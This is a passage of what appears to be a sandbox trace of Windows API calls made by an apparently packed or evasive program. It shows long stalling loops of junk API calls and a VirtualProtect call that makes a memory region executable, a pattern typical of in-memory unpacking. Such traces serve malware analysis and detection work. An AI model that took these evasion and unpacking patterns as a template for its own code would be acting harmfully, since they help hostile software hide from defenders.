CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.274] GetACP () returned 0x4e4 [0164.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.275] GetACP () returned 0x4e4 [0164.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.276] GetACP () returned 0x4e4 [0164.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.277] GetACP () returned 0x4e4 [0164.936] VirtualProtect (in: lpAddress=0x4f5ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0164.936] AddAtomA (lpString=0x0) returned 0x0 [0164.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.936] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.937] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.937] AddAtomA (lpString=0x0) returned 0x0 [0164.937] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.938] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.938] AddAtomA (lpString=0x0) returned 0x0 [0164.938] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.939] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.939] AddAtomA (lpString=0x0) returned 0x0 [0164.939] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.940] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.940] AddAtomA (lpString=0x0) returned 0x0 [0164.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.941] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.941] AddAtomA (lpString=0x0) returned 0x0 [0164.941] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.942] AddAtomA (lpString=0x0) returned 0x0 [0164.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.942] AddAtomA (lpString=0x0) returned 0x0 [0164.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.942] AddAtomA (lpString=0x0) returned 0x0 [0164.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.942] AddAtomA (lpString=0x0) returned 0x0 [0164.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.942] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.942] AddAtomA (lpString=0x0) returned 0x0 [0164.942] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.943] AddAtomA (lpString=0x0) returned 0x0 [0164.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 